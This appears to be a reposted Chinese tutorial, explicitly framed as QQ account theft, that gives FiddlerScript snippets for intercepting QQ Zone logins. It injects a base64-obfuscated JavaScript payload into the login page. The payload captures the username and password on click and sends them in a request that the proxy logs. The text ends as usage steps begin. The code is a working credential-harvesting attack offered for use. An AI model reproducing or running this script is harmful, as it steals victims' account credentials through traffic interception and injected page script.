FiddlerScript实现对QQ空间账号密码获取

2023-08-11 01:41| 来源: 网络整理| 查看: 265

代码片段1

//放入FiddlerScript最开头 import System.Text.RegularExpressions;

代码片段2

//放在OnBeforeRequest上面 public static RulesOption("是否开启QQ空间盗号功能") BindPref("fiddlerscript.rules.daohao") var m_daohao: boolean = false; static function getQQ(QQBody){ //下面是正则表达式用法 var r = new Regex('user=(.*?)&pass=(.*?)$'); var mc = r.Match(QQBody); if(mc.Groups[1].Value == ""){ //没有匹配到，不再执行后面的代码 FiddlerObject.log("[提示]:获取QQ空间密码失败，检查一下植入JS代码是否成功"); return; } FiddlerObject.log("[提示]:获取账号密码成功，账号为:"+mc.Groups[1].Value+"密码为:"+mc.Groups[2].Value); }

代码片段3

//OnBeforeRequest里面 if(m_daohao && oSession.fullUrl.Contains("xui.ptlogin2.qq.com/data?user")){ FiddlerObject.log("[提示]:正在获取账号信息"); var url = oSession.fullUrl; getQQ(url) }

代码片段4

//OnBeforeResponse里面 if(m_daohao && oSession.fullUrl.Contains("https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=")){ //解码数据包，防止乱码 oSession.utilDecodeResponse(); //替换数据包 oSession.utilReplaceInResponse("",'eval(atob("ZnVuY3Rpb24gbG9hZFhNTERvYyh1c2VyLHBhc3MpDQp7DQoJdmFyIHhtbGh0dHA7DQoJaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkNCgl7DQoJCQ0KCQl4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KCX0NCgllbHNlDQoJew0KCQkNCgkJeG1saHR0cD1uZXcgQWN0aXZlWE9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKTsNCgl9DQoJeG1saHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KCXsNCgkJaWYgKHhtbGh0dHAucmVhZHlTdGF0ZT09NCAmJiB4bWxodHRwLnN0YXR1cz09MjAwKQ0KCQl7DQoJCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibXlEaXYiKS5pbm5lckhUTUw9eG1saHR0cC5yZXNwb25zZVRleHQ7DQoJCX0NCgl9DQoJeG1saHR0cC5vcGVuKCJHRVQiLCIvZGF0YT91c2VyPSIrdXNlcisiJnBhc3M9IitwYXNzLHRydWUpOw0KCXhtbGh0dHAuc2VuZCgpOw0KfQ0KDQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibG9naW5fYnV0dG9uIikuYWRkRXZlbnRMaXN0ZW5lcigiY2xpY2siLGZ1bmN0aW9uKCl7DQoJdmFyIHVzZXIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidSIpLnZhbHVlOw0KCXZhciBwd2QgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicCIpLnZhbHVlOw0KCWxvYWRYTUxEb2ModXNlcixwd2QpDQp9KQ=="))') }

代码使用步骤:

1.点击FiddlerScript